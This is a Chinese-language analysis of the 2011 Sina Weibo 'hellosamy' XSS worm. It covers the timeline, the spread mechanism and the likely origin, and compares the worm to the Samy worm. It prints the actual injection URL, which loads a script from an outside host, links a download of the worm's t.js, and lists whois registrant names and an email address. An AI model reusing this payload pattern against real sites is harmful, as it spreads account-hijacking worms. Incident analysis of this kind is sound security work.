新浪微博攻击事件分析

pk-feiyang

一、事件的经过

新浪微博突然出现大范围“中毒”，大量用户自动发送“建党大业中穿帮的地方”、“个税起征点有望提到4000”、“郭美美事件的一些未注意到的细节”、“3D肉团团高清普通话版种子”等带链接的微博与私信，并自动关注一位名为hellosamy的用户。

事件的效果：


和


事件的经过线索如下：

20:14，开始有大量带V的认证用户中招转发蠕虫
20:30，2kt.cn中的病毒页面无法访问
20:32，新浪微博中hellosamy用户无法访问
21:02，新浪漏洞修补完毕

影响有多大：32961（这位hellosamy在帐号被封前的好友数量）。


二、采用了什么样的攻击方法

1、利用了新浪微博存在的XSS漏洞；

2、使用有道提供的短域名服务（这些网址目前已经“无害”）；

例如，通过http://163.fm/PxZHoxn，将链接指向：
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

3、当新浪登陆用户不小心访问到相关网页时，由于处于登录状态，会运行这个js脚本做几件事情：

a.发微博（让更多的人看到这些消息，自然也就有更多人受害）；
b.加关注，加uid为2201270010的用户关注——这应该就是大家提到的hellosamy了；
c.发私信，给好友发私信传播这些链接；

三、攻击者是谁？

攻击者不一定是2kt.cn的拥有者。目前暂时只能获得2kt.cn域名、网站拥有者信息如下。
不排除这个网站被攻击后，服务器被人放置恶意代码。

通过whois查询，2kt.cn的域名拥有者信息如下：

注册人： 张志
管理员邮件：lin5061@gmail.com

通过工信部的备案查询：http://www.miibeian.gov.cn/publish/query/indexFirst.action

网站负责人姓名：刘孝德
网站备案/许可证号：苏ICP备10108026号-1

四、为什么叫hellosamy？

2005年，首个利用跨站点脚本缺陷的蠕虫samy被“创造”出来了。Samy利用网站设计方面的缺陷，创建了一份“恶意”的用户档案，当该用户档案被浏 览时，就会自动地激活代码，将用户添加到Samy的“好友”列表中。另外，恶意代码还会被拷贝到用户的档案中，当其他人查看用户的档案时，蠕虫会继续传 播。Samy蠕虫能够造成与拒绝服务相当的效应，会造成好友列表中好友数量呈指数级增长，最终会消耗系统的大量资源。

因此，这次新浪微博的蠕虫，象是在对samy蠕虫致敬

五、参考信息

samy蠕虫的传播经历与技术细节：http://namb.la/popular，http://namb.la/popular/tech.html
新浪hellosamy蠕虫的传播与细节：http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2

六、本次蠕虫事件中的代码下载

t.js下载地址： 06.28_sina_XSS.txt.zip

原文：http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2